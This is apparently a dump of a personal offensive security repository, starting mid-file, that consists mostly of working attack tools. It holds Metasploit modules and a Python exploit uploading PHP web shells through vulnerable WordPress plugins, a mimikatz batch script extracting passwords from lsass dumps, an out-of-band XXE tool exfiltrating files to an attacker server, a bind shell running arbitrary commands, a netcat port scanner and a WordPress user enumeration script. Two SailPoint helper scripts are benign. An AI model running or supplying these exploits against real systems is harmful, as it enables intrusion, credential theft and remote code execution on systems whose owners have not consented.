#{@shellLoc}") 78 | res = send_request_cgi('uri' => @shellLoc) 79 | 80 | handler 81 | 82 | print_error('Payload failed to upload') if res && res.code == 404 83 | end 84 | end 85 | -------------------------------------------------------------------------------- /metasploit_modules/wp_webapp_builder.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin webapp-builder v2.0 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. 
Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002002'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8773), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin webapp-builder v2.0', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images', respShell.strip) 79 | print_status("Requesting #{@shellLoc}") 80 | res = send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | 
print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /mimi_multidump.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem This is a script that takes all .dmp files in the current folder and uses mimikatz to dump them 3 | rem you can modify items in the script 4 | echo " " 5 | echo ################################### 6 | echo #Mimikatz Dumper By Munir Njiru # 7 | echo ################################### 8 | echo " " 9 | setlocal enabledelayedexpansion 10 | for %%f in (*.dmp) do ( 11 | rem pick file name from above without extension 12 | SET lsass_dump=%%~nf 13 | rem my files follow a naming convention i.e. lsass_hostname_or_ip.dmp 14 | rem this section renames the lsass prefix to passwords prefix to seperate dump from textfile i.e. passwords_hostname_or_ip.dmp 15 | SET password_file=!lsass_dump:lsass=passwords! 16 | rem mimi64 references my global mimikatz parameter change to suit yours; you can add mimikatz to environment variables to access it globally 17 | mimi64 "sekurlsa::minidump !lsass_dump!.dmp" "log !password_file!.txt" sekurlsa::logonpasswords exit 18 | echo "done dumping !lsass_dump!.dmp to !password_file!.txt" 19 | ) 20 | exit 21 | -------------------------------------------------------------------------------- /oob_xxe/server/checkrce.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/dtd: -------------------------------------------------------------------------------- 1 | ">%all; -------------------------------------------------------------------------------- /oob_xxe/server/getFile.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> 
-------------------------------------------------------------------------------- /oob_xxe/server/getFileEncoded.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/rceEncoded.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Simply a replication of the Python SimpleHTTPServer but with added functionality to simply log requests 3 | __author__ = "Munir Njiru" 4 | __email__ = "munir@alien-within.com" 5 | __status__ = "Production" 6 | 7 | import SimpleHTTPServer as xxeDTDServer 8 | import SocketServer 9 | import sys 10 | import base64 11 | 12 | PORT = 8000 13 | 14 | class xxeServerHandler(xxeDTDServer.SimpleHTTPRequestHandler): 15 | log_file = open('xxelog.txt', 'a') 16 | def log_message(self, format, *args): 17 | self.log_file.write("%s - - [%s] %s\n" % 18 | (self.client_address[0], 19 | self.log_date_time_string(), 20 | base64.b64decode(format%args))) 21 | 22 | try: 23 | Handler = xxeServerHandler 24 | httpd = SocketServer.TCPServer(("", PORT), Handler) 25 | print "Starting XXE Server on port: ", PORT 26 | print 'Press ^C to shut down the web server' 27 | httpd.serve_forever() 28 | except: 29 | print '^C received, shutting down the web server' 30 | httpd.socket.close() -------------------------------------------------------------------------------- /oob_xxe/server/xxelog.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/oob_xxe/server/xxelog.txt -------------------------------------------------------------------------------- 
/oob_xxe/xxe_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | import requests as alienOOBXXERequestor 7 | import tldextract 8 | 9 | print "#######################################\n" 10 | print "Simple Out of Band XXE Injection Tool.\nby Alienwithin\nVersion: 1.0\nWebsite: https://www.alien-within.com\n" 11 | print "#######################################\n\n" 12 | ''' 13 | Basic Settings that should be changed below: 14 | - Endpoint to attack or webservice URL 15 | - IP and Port of python simple http server (i.e attacker's server to receive information) or XXE Server Component 16 | ''' 17 | attacker_ip = "ATTACKER IP" 18 | attacker_port = "ATTACKER PORT" 19 | endpoint = "URL TO VICTIM WEBSERVICE e.g. http://target.com/webservice.php" 20 | fullURL=tldextract.extract(endpoint) 21 | targetHostname=fullURL.domain 22 | ''' 23 | Basic Settings End 24 | 25 | Ignore the below its basic Headers predefined 26 | ''' 27 | 28 | XXEHeaders = { 29 | 'Host': targetHostname, 30 | 'Accept': 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', 31 | 'Accept-Encoding': 'gzip, deflate', 32 | 'Accept-Language': 'en-us,en;q=0.5', 33 | 'Cache-Control': 'no-cache', 34 | 'Content-Type': 'text/xml', 35 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36', 36 | 'X-HTTP-Method-Override': 'GET' 37 | } 38 | 39 | ''' 40 | From this section downwards we have the Four attack Types supported so far: 41 | - Pinging to see if we can force it to connect to our target server from the target 42 | - Retrieve File with no encoding 43 | - Retrieve file base64 encoded incase of borderline protection 44 | - Attempt RCE via the expect module if it is loaded (PHP only) 45 | ''' 46 | attack_type = raw_input("What 
attack type would you like to execute?\n1. Simple Connect Back Request\n2. Attempt to Retrieve File (File Protocol)\n3. Attempt to retrieve file (Using PHP filter wrapper)\n4. Check Code execution using expect\n") 47 | 48 | if attack_type=="1": 49 | print "Please ensure you have started python HTTP Server in another commandline tab; to do so run the command below:\npython -m SimpleHTTPServer\n\nAfter this is done please confirm that the IP address and port are configured in the script in the settings section.\n" 50 | check_complete=raw_input("Proceed with attack?\n1. Yes\n2. No\n") 51 | if check_complete == "1": 52 | connect_back = " %dtd;]>&a;" 53 | testConnectBack = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data={'name':connect_back}) 54 | print testConnectBack.text 55 | else: 56 | print "User aborted the attack; script will now exit. " 57 | exit() 58 | 59 | elif attack_type == "2": 60 | getFilePlain = " %get%dtd;]>" 61 | testPlainFileRetrieve=alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=getFilePlain) 62 | print testPlainFileRetrieve.text 63 | 64 | elif attack_type == "3": 65 | getFileEncoded = " %remote; %internal; %xxe; ]>" 66 | testEncodedFileRetrieve = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=getFileEncoded) 67 | print testEncodedFileRetrieve.text 68 | 69 | elif attack_type == "4": 70 | checkRCE = " %remote; %internal; %xxe; ]>" 71 | testRCE = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=checkRCE) 72 | print testRCE.text 73 | 74 | else: 75 | print "I really don't know the attack type you are trying to run I will now exit" 76 | exit() 77 | 78 | -------------------------------------------------------------------------------- /portscan/nc_portscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Script to conduct portscans via netcat when Nmap is not working in environments for some reason 3 | #By Munir Njiru 4 | 5 | ##Config Elements 6 | 
output_file='top_1000_ports_found.txt' # File that will contain the ports found 7 | port_range='ports_1000.txt' #File that contains various port ranges or individual ports to check 8 | ip_addresses='scan_ips.txt' #file containing IP addresses to scan 9 | ## End Config 10 | while read ip; do 11 | while read portrange; do 12 | echo "Working on... $ip and $portrange" 13 | nc -zvw 1 $ip $portrange 2>&1 |grep succeeded | tee -a $output_file 14 | done <$port_range 15 | done <$ip_addresses 16 | -------------------------------------------------------------------------------- /portscan/ports_1000.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 3-4 3 | 6-7 4 | 9 5 | 13 6 | 17 7 | 19-26 8 | 30 9 | 32-33 10 | 37 11 | 42-43 12 | 49 13 | 53 14 | 70 15 | 79-85 16 | 88-90 17 | 99-100 18 | 106 19 | 109-111 20 | 113 21 | 119 22 | 125 23 | 135 24 | 139 25 | 143-144 26 | 146 27 | 161 28 | 163 29 | 179 30 | 199 31 | 211-212 32 | 222 33 | 254-256 34 | 259 35 | 264 36 | 280 37 | 301 38 | 306 39 | 311 40 | 340 41 | 366 42 | 389 43 | 406-407 44 | 416-417 45 | 425 46 | 427 47 | 443-445 48 | 458 49 | 464-465 50 | 481 51 | 497 52 | 500 53 | 512-515 54 | 524 55 | 541 56 | 543-545 57 | 548 58 | 554-555 59 | 563 60 | 587 61 | 593 62 | 616-617 63 | 625 64 | 631 65 | 636 66 | 646 67 | 648 68 | 666-668 69 | 683 70 | 687 71 | 691 72 | 700 73 | 705 74 | 711 75 | 714 76 | 720 77 | 722 78 | 726 79 | 749 80 | 765 81 | 777 82 | 783 83 | 787 84 | 800-801 85 | 808 86 | 843 87 | 873 88 | 880 89 | 888 90 | 898 91 | 900-903 92 | 911-912 93 | 981 94 | 987 95 | 990 96 | 992-993 97 | 995 98 | 999-1002 99 | 1007 100 | 1009-1011 101 | 1021-1100 102 | 1102 103 | 1104-1108 104 | 1110-1114 105 | 1117 106 | 1119 107 | 1121-1124 108 | 1126 109 | 1130-1132 110 | 1137-1138 111 | 1141 112 | 1145 113 | 1147-1149 114 | 1151-1152 115 | 1154 116 | 1163-1166 117 | 1169 118 | 1174-1175 119 | 1183 120 | 1185-1187 121 | 1192 122 | 1198-1199 123 | 1201 124 | 1213 125 | 1216-1218 126 
| 1233-1234 127 | 1236 128 | 1244 129 | 1247-1248 130 | 1259 131 | 1271-1272 132 | 1277 133 | 1287 134 | 1296 135 | 1300-1301 136 | 1309-1311 137 | 1322 138 | 1328 139 | 1334 140 | 1352 141 | 1417 142 | 1433-1434 143 | 1443 144 | 1455 145 | 1461 146 | 1494 147 | 1500-1501 148 | 1503 149 | 1521 150 | 1524 151 | 1533 152 | 1556 153 | 1580 154 | 1583 155 | 1594 156 | 1600 157 | 1641 158 | 1658 159 | 1666 160 | 1687-1688 161 | 1700 162 | 1717-1721 163 | 1723 164 | 1755 165 | 1761 166 | 1782-1783 167 | 1801 168 | 1805 169 | 1812 170 | 1839-1840 171 | 1862-1864 172 | 1875 173 | 1900 174 | 1914 175 | 1935 176 | 1947 177 | 1971-1972 178 | 1974 179 | 1984 180 | 1998-2010 181 | 2013 182 | 2020-2022 183 | 2030 184 | 2033-2035 185 | 2038 186 | 2040-2043 187 | 2045-2049 188 | 2065 189 | 2068 190 | 2099-2100 191 | 2103 192 | 2105-2107 193 | 2111 194 | 2119 195 | 2121 196 | 2126 197 | 2135 198 | 2144 199 | 2160-2161 200 | 2170 201 | 2179 202 | 2190-2191 203 | 2196 204 | 2200 205 | 2222 206 | 2251 207 | 2260 208 | 2288 209 | 2301 210 | 2323 211 | 2366 212 | 2381-2383 213 | 2393-2394 214 | 2399 215 | 2401 216 | 2492 217 | 2500 218 | 2522 219 | 2525 220 | 2557 221 | 2601-2602 222 | 2604-2605 223 | 2607-2608 224 | 2638 225 | 2701-2702 226 | 2710 227 | 2717-2718 228 | 2725 229 | 2800 230 | 2809 231 | 2811 232 | 2869 233 | 2875 234 | 2909-2910 235 | 2920 236 | 2967-2968 237 | 2998 238 | 3000-3001 239 | 3003 240 | 3005-3007 241 | 3011 242 | 3013 243 | 3017 244 | 3030-3031 245 | 3052 246 | 3071 247 | 3077 248 | 3128 249 | 3168 250 | 3211 251 | 3221 252 | 3260-3261 253 | 3268-3269 254 | 3283 255 | 3300-3301 256 | 3306 257 | 3322-3325 258 | 3333 259 | 3351 260 | 3367 261 | 3369-3372 262 | 3389-3390 263 | 3404 264 | 3476 265 | 3493 266 | 3517 267 | 3527 268 | 3546 269 | 3551 270 | 3580 271 | 3659 272 | 3689-3690 273 | 3703 274 | 3737 275 | 3766 276 | 3784 277 | 3800-3801 278 | 3809 279 | 3814 280 | 3826-3828 281 | 3851 282 | 3869 283 | 3871 284 | 3878 285 | 3880 286 | 3889 287 | 3905 288 | 
3914 289 | 3918 290 | 3920 291 | 3945 292 | 3971 293 | 3986 294 | 3995 295 | 3998 296 | 4000-4006 297 | 4045 298 | 4111 299 | 4125-4126 300 | 4129 301 | 4224 302 | 4242 303 | 4279 304 | 4321 305 | 4343 306 | 4443-4446 307 | 4449 308 | 4550 309 | 4567 310 | 4662 311 | 4848 312 | 4899-4900 313 | 4998 314 | 5000-5004 315 | 5009 316 | 5030 317 | 5033 318 | 5050-5051 319 | 5054 320 | 5060-5061 321 | 5080 322 | 5087 323 | 5100-5102 324 | 5120 325 | 5190 326 | 5200 327 | 5214 328 | 5221-5222 329 | 5225-5226 330 | 5269 331 | 5280 332 | 5298 333 | 5357 334 | 5405 335 | 5414 336 | 5431-5432 337 | 5440 338 | 5500 339 | 5510 340 | 5544 341 | 5550 342 | 5555 343 | 5560 344 | 5566 345 | 5631 346 | 5633 347 | 5666 348 | 5678-5679 349 | 5718 350 | 5730 351 | 5800-5802 352 | 5810-5811 353 | 5815 354 | 5822 355 | 5825 356 | 5850 357 | 5859 358 | 5862 359 | 5877 360 | 5900-5904 361 | 5906-5907 362 | 5910-5911 363 | 5915 364 | 5922 365 | 5925 366 | 5950 367 | 5952 368 | 5959-5963 369 | 5987-5989 370 | 5998-6007 371 | 6009 372 | 6025 373 | 6059 374 | 6100-6101 375 | 6106 376 | 6112 377 | 6123 378 | 6129 379 | 6156 380 | 6346 381 | 6389 382 | 6502 383 | 6510 384 | 6543 385 | 6547 386 | 6565-6567 387 | 6580 388 | 6646 389 | 6666-6669 390 | 6689 391 | 6692 392 | 6699 393 | 6779 394 | 6788-6789 395 | 6792 396 | 6839 397 | 6881 398 | 6901 399 | 6969 400 | 7000-7002 401 | 7004 402 | 7007 403 | 7019 404 | 7025 405 | 7070 406 | 7100 407 | 7103 408 | 7106 409 | 7200-7201 410 | 7402 411 | 7435 412 | 7443 413 | 7496 414 | 7512 415 | 7625 416 | 7627 417 | 7676 418 | 7741 419 | 7777-7778 420 | 7800 421 | 7911 422 | 7920-7921 423 | 7937-7938 424 | 7999-8002 425 | 8007-8011 426 | 8021-8022 427 | 8031 428 | 8042 429 | 8045 430 | 8080-8090 431 | 8093 432 | 8099-8100 433 | 8180-8181 434 | 8192-8194 435 | 8200 436 | 8222 437 | 8254 438 | 8290-8292 439 | 8300 440 | 8333 441 | 8383 442 | 8400 443 | 8402 444 | 8443 445 | 8500 446 | 8600 447 | 8649 448 | 8651-8652 449 | 8654 450 | 8701 451 | 8800 452 | 8873 
453 | 8888 454 | 8899 455 | 8994 456 | 9000-9003 457 | 9009-9011 458 | 9040 459 | 9050 460 | 9071 461 | 9080-9081 462 | 9090-9091 463 | 9099-9103 464 | 9110-9111 465 | 9200 466 | 9207 467 | 9220 468 | 9290 469 | 9415 470 | 9418 471 | 9485 472 | 9500 473 | 9502-9503 474 | 9535 475 | 9575 476 | 9593-9595 477 | 9618 478 | 9666 479 | 9876-9878 480 | 9898 481 | 9900 482 | 9917 483 | 9929 484 | 9943-9944 485 | 9968 486 | 9998-10004 487 | 10009-10010 488 | 10012 489 | 10024-10025 490 | 10082 491 | 10180 492 | 10215 493 | 10243 494 | 10566 495 | 10616-10617 496 | 10621 497 | 10626 498 | 10628-10629 499 | 10778 500 | 11110-11111 501 | 11967 502 | 12000 503 | 12174 504 | 12265 505 | 12345 506 | 13456 507 | 13722 508 | 13782-13783 509 | 14000 510 | 14238 511 | 14441-14442 512 | 15000 513 | 15002-15004 514 | 15660 515 | 15742 516 | 16000-16001 517 | 16012 518 | 16016 519 | 16018 520 | 16080 521 | 16113 522 | 16992-16993 523 | 17877 524 | 17988 525 | 18040 526 | 18101 527 | 18988 528 | 19101 529 | 19283 530 | 19315 531 | 19350 532 | 19780 533 | 19801 534 | 19842 535 | 20000 536 | 20005 537 | 20031 538 | 20221-20222 539 | 20828 540 | 21571 541 | 22939 542 | 23502 543 | 24444 544 | 24800 545 | 25734-25735 546 | 26214 547 | 27000 548 | 27352-27353 549 | 27355-27356 550 | 27715 551 | 28201 552 | 30000 553 | 30718 554 | 30951 555 | 31038 556 | 31337 557 | 32768-32785 558 | 33354 559 | 33899 560 | 34571-34573 561 | 35500 562 | 38292 563 | 40193 564 | 40911 565 | 41511 566 | 42510 567 | 44176 568 | 44442-44443 569 | 44501 570 | 45100 571 | 48080 572 | 49152-49161 573 | 49163 574 | 49165 575 | 49167 576 | 49175-49176 577 | 49400 578 | 49999-50003 579 | 50006 580 | 50300 581 | 50389 582 | 50500 583 | 50636 584 | 50800 585 | 51103 586 | 51493 587 | 52673 588 | 52822 589 | 52848 590 | 52869 591 | 54045 592 | 54328 593 | 55055-55056 594 | 55555 595 | 55600 596 | 56737-56738 597 | 57294 598 | 57797 599 | 58080 600 | 60020 601 | 60443 602 | 61532 603 | 61900 604 | 62078 605 | 63331 606 | 
64623 607 | 64680 608 | 65000 609 | 65129 610 | 65389 611 | 280 612 | 4567 613 | 7001 614 | 8008 615 | 9080 -------------------------------------------------------------------------------- /portscan/readme.md: -------------------------------------------------------------------------------- 1 | ### Scanning Complex Environments 2 | This script comes in handy in environments that contain safeguards against scanning; 3 | it connects to ports and records those that respond. 4 | 5 | Once the 3 files it uses are configured, running it is simple: 6 | ``` 7 | sh nc_portscan.sh 8 | ``` 9 | 10 | ## Simple Script Flow 11 | 12 | ![Simple Flow](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/portscan/simple_flow.jpg) -------------------------------------------------------------------------------- /portscan/simple_flow.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/portscan/simple_flow.jpg -------------------------------------------------------------------------------- /pyrequires.txt: -------------------------------------------------------------------------------- 1 | requests 2 | json 3 | -------------------------------------------------------------------------------- /sailpoint/beanshell_json_compatible.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | ''' 6 | This script takes a regular bean shell script and 7 | parses it into a json compatible one liner from a 8 | python dictionary and escapes it to JSON in one liner 9 | format for passing to the API 10 | ''' 11 | import argparse 12 | import random 13 | import string 14 | import json 15 | global json_bean, output_file, bmr_string, bmr_file, the_script 16 | parser = argparse.ArgumentParser() 
17 | parser.add_argument('-f', '--file', help='Load a text file with the beanshell code') 18 | args = parser.parse_args() 19 | def to_sailpoint_json_bmr(bmr_string): 20 | 21 | file_name= ''.join(random.choice(string.ascii_letters) for i in range(10))+".json" 22 | output_file = open(str(file_name), "a") 23 | the_script={ 24 | "version": "1.0", 25 | "script": bmr_string 26 | } 27 | json.dump(the_script,output_file) 28 | output_file.close() 29 | print("output written to: "+str(file_name)) 30 | 31 | if args.file is not None: 32 | bmr_file = args.file 33 | beanshell_clean = open(bmr_file) 34 | bmr_string = beanshell_clean.read() 35 | beanshell_clean.close() 36 | to_sailpoint_json_bmr(bmr_string) 37 | -------------------------------------------------------------------------------- /sailpoint/build_map_rule_cleaner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | ''' 6 | This script takes a minified bean shell script from the Sailpoint API and 7 | parses it into a neat java file to allow editing later. 
8 | ''' 9 | import argparse 10 | import random 11 | import string 12 | global clean_shell,output_file, bmr_string, bmr_file 13 | parser = argparse.ArgumentParser() 14 | parser.add_argument('-f', '--file', help='Load a text file with the beanshell code') 15 | parser.add_argument('-s', '--string', help='Paste a string the beanshell code') 16 | args = parser.parse_args() 17 | def from_string(bmr_string): 18 | clean_shell = bmr_string.replace('\"','"').replace('\\n', '\n').replace('\\t', '\t') 19 | file_name= ''.join(random.choice(string.ascii_letters) for i in range(10))+".bsh" 20 | output_file = open(str(file_name), "a") 21 | output_file.write(clean_shell) 22 | output_file.close() 23 | print("output written to: "+str(file_name)) 24 | 25 | if args.file is not None: 26 | bmr_file = args.file 27 | beanshell_dirty = open(bmr_file) 28 | bmr_string = beanshell_dirty.read().replace('\"','"') 29 | beanshell_dirty.close() 30 | from_string(str(bmr_string)) 31 | elif args.string is not None: 32 | bmr_string = args.string 33 | from_string(bmr_string) -------------------------------------------------------------------------------- /simple_netcat_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | #To connect to it upload the script on the victim server 7 | #On your attack machine run the command below: 8 | 9 | #nc target-ip target-port 10 | 11 | ########################################## 12 | # Simple Reverse Listener 13 | # by Alienwithin 14 | ########################################### 15 | import socket 16 | import subprocess 17 | import sys 18 | import os 19 | ip = "victim-ip" 20 | port = 4445 21 | 22 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | server.bind((ip, port)) 24 | server.listen(10) 25 | 26 | print ("Listener ready on %s:%d" % (ip,port)) 27 | 28 | client, addr = 
server.accept() 29 | 30 | print ("Connected to %s on port %d" % (ip,port)) 31 | hostinfo=os.getenv('USERNAME')+"@"+socket.gethostname()+"~" 32 | while True: 33 | data = str(client.recv(1024)) 34 | data = data.strip() 35 | if not data: 36 | client.sendall(hostinfo+os.getcwd()+"# command cannot be blank my friend \n"+hostinfo+os.getcwd()+"#"+" ") 37 | print "" 38 | elif "cd" in data.strip(): 39 | pathExtract = data.replace ("cd ", "") 40 | os.chdir(pathExtract) 41 | client.sendall(hostinfo+os.getcwd()+"# Switched Path to: "+os.getcwd()+"\n"+hostinfo+os.getcwd()+"#"+" ") 42 | elif data.strip() == "pwd": 43 | client.sendall(hostinfo+os.getcwd()+"#"+" "+" "+os.getcwd()+"\n"+hostinfo+os.getcwd()+"#"+" ") 44 | elif data.strip() == "terminate": 45 | client.sendall("bye buddy") 46 | client.close() 47 | sys.exit(0) 48 | else: 49 | output = subprocess.check_output(data, shell=True) 50 | output=hostinfo+os.getcwd()+"#"+" "+output+"\n"+hostinfo+os.getcwd()+"#"+" " 51 | client.sendall(output) 52 | -------------------------------------------------------------------------------- /wp_ue_api.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | print "#############################################################" 4 | print "\tWordpress 4.7 User Enumeration PoC (CVE 2017-5487)\n\t\t\tWPVDB ID: 8715\n\n\t\t\tBy Alienwithin" 5 | print "#############################################################\n\n" 6 | targetSite = raw_input("Please enter the URL to target e.g. http://target.com : \nSite URL: ") 7 | NumberOfUsers = raw_input("Please enter the number of users to retrieve e.g. 
10\n") 8 | print "ID || Username || Full Name\n\n" 9 | for users in range(1, int(NumberOfUsers)): 10 | req = requests.get(targetSite+'/wp-json/wp/v2/users/'+str(users)) 11 | target_info_parsed = json.loads(req.text) 12 | if 'id' not in target_info_parsed: 13 | print "No user with ID :" + str(users) 14 | req.close() 15 | else: 16 | target_id = target_info_parsed['id'] 17 | target_name = target_info_parsed['name'] 18 | target_username = target_info_parsed['slug'] 19 | print str(target_id)+ " || "+ str(target_username) + " || "+ str(target_name)+"\n" 20 | req.close() 21 | 22 | -------------------------------------------------------------------------------- /zen_app_mobile_wp_rfu.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | print "---------------------------------------------------------------------" 5 | print "Multiple Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182" 6 | print "---------------------------------------------------------------------" 7 | victim = raw_input("Please Enter victim host e.g. http://example.com: ") 8 | plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. 
Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n") 9 | if plug_choice=="1": 10 | plugin="zen-mobile-app-native" 11 | elif plug_choice=="2": 12 | plugin="webapp-builder" 13 | elif plug_choice=="3": 14 | plugin="wp2android-turn-wp-site-into-android-app" 15 | elif plug_choice=="4": 16 | plugin="mobile-app-builder-by-wappress" 17 | elif plug_choice=="5": 18 | plugin="mobile-friendly-app-builder-by-easytouch" 19 | else: 20 | print "Invalid Plugin choice, I will now exit" 21 | quit() 22 | slug = "/wp-content/plugins/"+plugin+"/server/images.php" 23 | target=victim+slug 24 | def definShell(size=6, chars=string.ascii_uppercase + string.digits): 25 | return ''.join(random.choice(chars) for _ in range(size)) 26 | 27 | shellName= definShell()+".php" 28 | 29 | def checkExistence(): 30 | litmusTest = requests.get(target) 31 | litmusState = litmusTest.status_code 32 | if litmusState == 200: 33 | print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..." 
34 | exploit() 35 | else: 36 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 37 | quit() 38 | 39 | def exploit(): 40 | print "\nGenerating Payload: "+shellName+"\n" 41 | myShell = {'file': (shellName, '')} 42 | shellEmUp = requests.post(target, files=myShell) 43 | respShell = shellEmUp.text 44 | cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/") 45 | shellLoc = cleanURL.replace(" ", "") 46 | print "Confirming shell upload by printing current user\n" 47 | shellTest=requests.get(shellLoc+"?alien=whoami") 48 | webserverUser=shellTest.text 49 | if webserverUser == "": 50 | print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami" 51 | quit() 52 | else: 53 | print "The current webserver user is: "+webserverUser+"\n" 54 | print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command" 55 | quit() 56 | 57 | if __name__ == "__main__": 58 | checkExistence() 59 | --------------------------------------------------------------------------------